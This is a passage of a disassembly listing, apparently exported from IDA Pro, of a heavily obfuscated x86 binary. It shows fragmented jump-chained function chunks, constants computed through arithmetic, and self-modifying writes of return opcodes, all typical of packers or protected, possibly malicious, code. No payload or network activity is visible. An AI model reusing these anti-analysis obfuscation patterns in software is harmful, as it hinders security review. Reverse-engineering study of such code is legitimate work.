; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C044

loc_44575E:				; CODE XREF: sub_43C044+198E2j
		pop	edx
		lea	eax, sub_45866A
		mov	byte ptr [eax],	0C3h
		jmp	loc_4543CC
; END OF FUNCTION CHUNK	FOR sub_43C044

; =============== S U B	R O U T	I N E =======================================



sub_44576D	proc near		; CODE XREF: sub_41B423+5B4p
					; sub_44576D+5j
					; DATA XREF: ...
		call	sub_445787
		jmp	ds:off_41E09C
sub_44576D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445557

loc_445778:				; CODE XREF: sub_445557+133B5j
		jmp	loc_44C25B
; END OF FUNCTION CHUNK	FOR sub_445557
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_44577D:				; CODE XREF: sub_4599BE-15601j
		jmp	loc_44E830
; END OF FUNCTION CHUNK	FOR sub_4599BE
; ---------------------------------------------------------------------------

loc_445782:				; CODE XREF: y2kk37jd:0043E890j
		jmp	loc_43F63D

; =============== S U B	R O U T	I N E =======================================



sub_445787	proc near		; CODE XREF: sub_44576Dp
					; sub_43BA28:loc_451C78j ...

var_4		= dword	ptr -4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B056 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043B30D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043E545 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043EE80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F94D SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044068A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00441EC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044450B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004458EE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446C12 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447EEE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447FE8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448EA1 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00449E96 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044A18E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044BB22 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044BC80 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044C1A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C4DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C60F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044D2B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D7B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DC5D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044E339 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00450088 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450A5E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045130A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00452B92 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452FEC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045456C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00455059 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045633B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045675C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456E5D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00459009 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045A59F SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045B2D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BDDC SIZE 00000010 BYTES

		js	loc_44DC5D
		pop	edx
		jmp	loc_43F94D
sub_445787	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 0CB10B158h
		push	ecx
		push	5D29FA57h
		pop	ecx
		jmp	loc_43E192
; ---------------------------------------------------------------------------

loc_4457A4:				; CODE XREF: y2kk37jd:00446E78j
		cmp	ebp, 1AD4C5A1h
		jmp	loc_442C8D
; ---------------------------------------------------------------------------

loc_4457AF:				; CODE XREF: y2kk37jd:loc_4431F9j
					; y2kk37jd:00449F18j
		xor	ecx, 5EB3B3BAh
		add	ecx, 0EE2E911Bh
		xchg	ecx, [esp]
		jmp	loc_442215
; ---------------------------------------------------------------------------

loc_4457C3:				; CODE XREF: y2kk37jd:loc_4433E0j
					; y2kk37jd:004433EEj
		xor	eax, 6D081526h
		add	eax, 0D83C27D5h
		xchg	eax, [esp]
		jmp	loc_441E61
; ---------------------------------------------------------------------------
		mov	edx, 710DA469h
		push	ebx
		jmp	loc_4535AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451854

loc_4457E2:				; CODE XREF: sub_451854:loc_43F807j
		lea	eax, [ebp-20h]
		push	eax
		push	ecx
		call	sub_44A317

loc_4457EC:				; CODE XREF: y2kk37jd:0044A3B5j
		jmp	nullsub_433
; END OF FUNCTION CHUNK	FOR sub_451854
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44516F

loc_4457F1:				; CODE XREF: sub_44516F-20C5j
		jmp	loc_441635
; END OF FUNCTION CHUNK	FOR sub_44516F
; ---------------------------------------------------------------------------
		jmp	loc_44B1FC
; ---------------------------------------------------------------------------

loc_4457FB:				; DATA XREF: sub_453FAB+5o
		push	0ADBC5868h
		pop	ecx
		and	ecx, 33777D76h
		xor	ecx, 8F7B7D04h
		cmp	ecx, 90F3047Fh
		jmp	loc_44F749
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_445818:				; CODE XREF: sub_454D0F:loc_43DF07j
		mov	eax, [esp-4+arg_0]
		call	sub_4526B7
		retn
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_445821:				; CODE XREF: sub_44DED9+11j
		jmp	loc_44EBC9
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_445826:				; CODE XREF: sub_4408B9+47EAj
		jmp	loc_457150
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459672

loc_44582B:				; CODE XREF: sub_459672-1B822j
		jmp	loc_43B3D0
; END OF FUNCTION CHUNK	FOR sub_459672
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_445830:				; CODE XREF: sub_454D0F-DD84j
		ror	eax, 1Fh
		xor	eax, 787C63C5h
		mov	edx, [esp-4+arg_0]
		jmp	loc_44035E
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
		db 7Bh,	9Dh, 0D1h
dword_445844	dd 39C6EFCFh		; DATA XREF: sub_45B7AA-6A47r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_445848:				; CODE XREF: sub_43B163+137BEj
		jmp	loc_448859
; END OF FUNCTION CHUNK	FOR sub_43B163
; ---------------------------------------------------------------------------
		db 56h,	46h, 18h
dword_445850	dd 7E79C907h		; DATA XREF: sub_4536F2+Dr
					; y2kk37jd:0045BD17w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_445854:				; CODE XREF: sub_43ED19+1AA40j
		jmp	loc_45BAB0
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
		db 7Ch,	0C9h, 2
dword_44585C	dd 729DF52Fh		; DATA XREF: sub_4460D0+Dr
					; sub_44B79D+7r ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_445860:				; CODE XREF: sub_44753E-7141j
		jmp	loc_455B5B
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453778

loc_445865:				; CODE XREF: sub_453778-15388j
		jmp	loc_4451B0
; END OF FUNCTION CHUNK	FOR sub_453778
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D61E

loc_44586A:				; CODE XREF: sub_43D61E-723j
		jmp	loc_442455
; END OF FUNCTION CHUNK	FOR sub_43D61E
; ---------------------------------------------------------------------------
		db 26h
dword_445870	dd 2CC77D5Ch		; DATA XREF: sub_43D779+3w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448C1

loc_445874:				; CODE XREF: sub_4448C1+Cj
		jmp	sub_45404D
; END OF FUNCTION CHUNK	FOR sub_4448C1
; ---------------------------------------------------------------------------

loc_445879:				; DATA XREF: sub_457042:loc_43D4BEo
		xchg	eax, [esp]
		jmp	sub_442C3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456BAC

loc_445881:				; CODE XREF: sub_456BAC:loc_44115Dj
		push	0EC5B6F8Ah
		pop	ecx
		add	ecx, 0C3F7805Ah
		or	ecx, 0A8EF3773h

loc_445893:				; CODE XREF: sub_44B814:loc_453A6Fj
		rol	ecx, 12h
		sub	ecx, 0AA677C06h
		jmp	loc_443820
; END OF FUNCTION CHUNK	FOR sub_456BAC
; ---------------------------------------------------------------------------
		rol	ebx, 13h
		jmp	sub_44DBF8
; ---------------------------------------------------------------------------
		mov	ds:dword_41E18C, eax
		lea	eax, nullsub_494
		mov	byte ptr [eax],	0C3h
		jmp	loc_454F48
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B6E8

loc_4458BD:				; CODE XREF: sub_44B6E8+1j
		mov	eax, [esp+0]
		push	offset loc_43C59C
		jmp	nullsub_523
; END OF FUNCTION CHUNK	FOR sub_44B6E8

; =============== S U B	R O U T	I N E =======================================



sub_4458CA	proc near		; CODE XREF: sub_4429DD+1604p

; FUNCTION CHUNK AT 00446B9C SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		pop	esi
		lea	eax, loc_455AB5
		mov	byte ptr [eax],	0C3h
		jmp	loc_446B9C
sub_4458CA	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4458DD	proc near		; CODE XREF: sub_417ADF+1Dp
					; sub_417BB2+1Bp
					; DATA XREF: ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043D2ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D49A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D667 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D71E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043ED9F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F743 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004403B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440585 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00440ABF SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441404 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044157F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00442EC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443D12 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00443E47 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00444221 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444604 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044563F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00446762 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044794C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447F9D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004482B6 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044895E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448AD8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448C6D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00449002 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004495CE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B4CC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044B532 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B57E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B5AD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044C069 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044C9C1 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044CB00 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044CBC8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044D098 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044D2FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D7A8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DB06 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E019 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044E21D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044E6BD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044F20A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044F510 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FC4D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451B49 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00451B9C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452F6E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00453177 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004531C6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004531F7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004532A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453E0C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00454914 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454E70 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00455262 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00455907 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455B73 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00456857 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456C15 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00457DAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004580D8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045ABF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C5F5 SIZE 00000005 BYTES

		jz	loc_4482B6
		mov	eax, ds:dword_4438A8
		jmp	loc_44F510
sub_4458DD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_4458EE:				; CODE XREF: sub_445787:loc_44D2B8j
		sub	eax, esi
		pop	esi
		xor	eax, 40D6EC69h
		jmp	loc_43EE80
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A961

loc_4458FC:				; CODE XREF: sub_45A961j
		mov	eax, ds:dword_4447DC
		or	eax, eax
		jnz	loc_443885
		jmp	loc_44512E
; END OF FUNCTION CHUNK	FOR sub_45A961
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E83

loc_44590F:				; CODE XREF: sub_444E83+B7Bj
		xor	ebp, 0C44E753Dh

loc_445915:				; CODE XREF: sub_454E20:loc_440116j
		jle	loc_45470F

loc_44591B:				; CODE XREF: y2kk37jd:loc_4541B8j
					; sub_444E83:loc_454E4Cj
		lea	edx, [ebp+var_14]
		push	33329F53h
		pop	eax
		sub	eax, 1446F2A7h
		or	eax, 0C980B358h
		xor	eax, 0E5185794h
		jmp	loc_459A16
; END OF FUNCTION CHUNK	FOR sub_444E83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D5A6

loc_44593B:				; CODE XREF: sub_44D5A6+B185j
		jnz	loc_43FBE7
		sub	ebp, eax
		shl	eax, 17h
		jmp	loc_43FBE7
; END OF FUNCTION CHUNK	FOR sub_44D5A6
; ---------------------------------------------------------------------------

loc_44594B:				; CODE XREF: y2kk37jd:0045887Bj
		shl	eax, 0Ch

; =============== S U B	R O U T	I N E =======================================



sub_44594E	proc near		; CODE XREF: sub_458DD9:loc_44DE29p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C41B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CD21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F713 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004404D1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442AF2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044301F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00443B1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD33 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D477 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044D9E3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044EE5C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044F8AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450B51 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045370F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004553AE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A07A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045A9B7 SIZE 0000001C BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_445226

loc_44595B:				; CODE XREF: sub_43DD0E+1179Fj
		jmp	loc_4404D1
sub_44594E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_445960:				; CODE XREF: y2kk37jd:00448364j
		jmp	loc_44D96C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_445965:				; CODE XREF: sub_44113A+661Ej
		not	esi
		jmp	loc_4466A6
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_44596C:				; CODE XREF: sub_4490B4:loc_45C6ADj
		mov	esi, ecx
		pop	ecx
		or	esi, 0A139B0F2h
		sub	esi, 80AD4E16h
		and	esi, 0FB15FE9Eh
		jmp	loc_44C3B3
; END OF FUNCTION CHUNK	FOR sub_4490B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_445986:				; CODE XREF: sub_454413:loc_4415DEj
		add	eax, ebp
		add	eax, 474409E2h
		push	eax

loc_44598F:				; CODE XREF: y2kk37jd:loc_4440A5j
		push	4
		push	edi

loc_445992:				; CODE XREF: y2kk37jd:00441838j
		mov	edi, esi
		jmp	loc_43EFF9
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457FDC

loc_445999:				; CODE XREF: sub_457FDC:loc_43D2F2j
		jz	loc_44D36E
		jmp	loc_44EC53
; END OF FUNCTION CHUNK	FOR sub_457FDC
; ---------------------------------------------------------------------------

loc_4459A4:				; CODE XREF: y2kk37jd:004410C9j
		jl	loc_450A40
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_4459AA:				; CODE XREF: sub_449C4F-A363j
		jmp	loc_448A9F
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
		pushf
		xor	ebx, ebp
		jmp	loc_450A38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4459B7:				; CODE XREF: sub_445226+1CCj
		mov	ebx, 74AE3A03h
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_4459BC	proc near		; CODE XREF: sub_43E25A+19038p
		xchg	edi, [esp+0]
		pop	edi
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+0]
		retn
sub_4459BC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866D

loc_4459C7:				; CODE XREF: sub_44866D+D335j
		jmp	loc_44DBF1
; END OF FUNCTION CHUNK	FOR sub_44866D

; =============== S U B	R O U T	I N E =======================================



sub_4459CC	proc near		; CODE XREF: sub_45A05D-13BDj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C695 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004405D9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004442AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004493EC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458ED4 SIZE 00000022 BYTES

		push	ebp
		jmp	loc_4442AF
sub_4459CC	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_396. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_4459D3:				; CODE XREF: sub_453867+7711j
		jmp	loc_45A8C2
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EDF8

loc_4459D8:				; CODE XREF: sub_44EDF8+7D80j
		jmp	loc_4482E6
; END OF FUNCTION CHUNK	FOR sub_44EDF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_4459DD:				; CODE XREF: sub_4440AB:loc_456FD4j
		mov	eax, 8D800AAh
		call	sub_442C3E
		mov	ds:dword_41E190, eax
		lea	eax, nullsub_13
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_13
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E83

loc_4459FB:				; CODE XREF: sub_444E83+FFCFj
		add	eax, esi
		pop	ebx
		jmp	loc_44590F
; END OF FUNCTION CHUNK	FOR sub_444E83
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_353. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_445A04:				; CODE XREF: sub_449DFE+141Aj
					; sub_449DFE:loc_45A943j
		call	nullsub_11

loc_445A09:				; CODE XREF: y2kk37jd:loc_447492j
		jnz	loc_44E38E
		xor	eax, eax
		call	sub_456136
; END OF FUNCTION CHUNK	FOR sub_449DFE
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_445A16:				; CODE XREF: sub_4507BF-2744j
		jmp	loc_4533BE
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A783

loc_445A1B:				; CODE XREF: sub_45A783-1CD98j
		jmp	nullsub_334
; END OF FUNCTION CHUNK	FOR sub_45A783
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E9

loc_445A20:				; CODE XREF: sub_4554E9-1171Ej
		pop	ecx
		xchg	ebp, [esp+0]
		mov	ebx, ebp
		pop	ebp
		jmp	loc_4560D8
; END OF FUNCTION CHUNK	FOR sub_4554E9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_69. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_445A2D	proc near		; DATA XREF: y2kk37jd:00442B60o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043FAE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044715E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00447353 SIZE 00000005 BYTES

		xor	edx, 30924D18h
		push	esi
		push	0E28C12AFh
		pop	esi
		rol	esi, 19h
		add	esi, 0A07FD476h
		jmp	loc_43FAE6
sub_445A2D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_445A48:				; CODE XREF: sub_43BD0D:loc_43B01Ej
		mov	[esi], eax
		pop	esi
		retn
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------

loc_445A4C:				; CODE XREF: y2kk37jd:00456400j
		jmp	loc_4444DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_445A51:				; CODE XREF: sub_451A35-1387Ej
		rol	eax, 12h
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+0]
		retn
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_445A5B:				; CODE XREF: sub_442DDC+7E96j
		jmp	nullsub_200
; END OF FUNCTION CHUNK	FOR sub_442DDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAD1

loc_445A60:				; CODE XREF: sub_45AAD1-18A1Cj
		jmp	loc_44A6F7
; END OF FUNCTION CHUNK	FOR sub_45AAD1
; ---------------------------------------------------------------------------

loc_445A65:				; CODE XREF: y2kk37jd:0044027Fj
		jmp	loc_45A680
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456BCD

loc_445A6A:				; CODE XREF: sub_456BCD+1Ej
		call	sub_442C3E
		mov	ds:dword_41E130, eax
		lea	eax, nullsub_480
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_480
; END OF FUNCTION CHUNK	FOR sub_456BCD
; ---------------------------------------------------------------------------
		push	eax
		jmp	loc_455660
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590D6

loc_445A89:				; CODE XREF: sub_4590D6:loc_4421ECj
		cmp	al, 0C2h
		jz	loc_452656
		mov	eax, [ebp-4]
		mov	ax, [eax]
		jmp	loc_44B6A5
; END OF FUNCTION CHUNK	FOR sub_4590D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_445A9C:				; CODE XREF: sub_4507BF+61CCj
		and	ebx, 0B522D2BAh

loc_445AA2:				; CODE XREF: sub_4507BF:loc_442F1Fj
		cmp	dword ptr [ebp-108h], 436E6F4Dh
		jnz	loc_4583B4
		jmp	loc_44A4CD
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_445AB7:				; CODE XREF: y2kk37jd:loc_453EC9j
					; y2kk37jd:00455A48j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4422CD
		jmp	loc_44D6CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_445AC8:				; CODE XREF: sub_453867-150D2j
		adc	ebp, 23A52239h
		xor	ebp, 0CAE183F0h
		jmp	loc_454013
; END OF FUNCTION CHUNK	FOR sub_453867

; =============== S U B	R O U T	I N E =======================================



sub_445AD9	proc near		; DATA XREF: y2kk37jd:loc_45BF7Fo

; FUNCTION CHUNK AT 0044A6D9 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		jmp	loc_44A6D9
sub_445AD9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CC31

loc_445AE1:				; CODE XREF: sub_44CC31:loc_44AED5j
		xchg	edx, ebp
		xor	edi, ebp
		pushf
		pop	edx
		xor	ecx, 0B47331F1h
		jmp	loc_45891C
; END OF FUNCTION CHUNK	FOR sub_44CC31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447423

loc_445AF2:				; CODE XREF: sub_447423+A4CAj
		add	eax, 6E4D81BEh
		mov	eax, [eax]
		push	eax
		call	sub_447832
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+0]
		jmp	loc_442684
; END OF FUNCTION CHUNK	FOR sub_447423
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_445B0B:				; CODE XREF: sub_445568:loc_44C201j
		xor	eax, esi
		call	sub_455C79

loc_445B12:				; CODE XREF: sub_43ED19+1B8F4j
		jmp	loc_442A45
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589B7

loc_445B17:				; CODE XREF: sub_4589B7+Aj
		jmp	loc_452F14
; END OF FUNCTION CHUNK	FOR sub_4589B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A12

loc_445B1C:				; CODE XREF: sub_448A12-1FEBj
		jmp	nullsub_233
; END OF FUNCTION CHUNK	FOR sub_448A12
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD49

loc_445B21:				; CODE XREF: sub_44AD49-8B40j
		push	0
		lea	eax, [ebp+var_400]
		push	offset sub_456809
		jmp	nullsub_142
; END OF FUNCTION CHUNK	FOR sub_44AD49
; ---------------------------------------------------------------------------

loc_445B33:				; CODE XREF: y2kk37jd:004545F2j
		mov	eax, 49577074h

; =============== S U B	R O U T	I N E =======================================



sub_445B38	proc near		; CODE XREF: sub_45689F-13EEDp

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043D9DA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004487EF SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0044E5AE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004500B5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455167 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004565B3 SIZE 0000000E BYTES
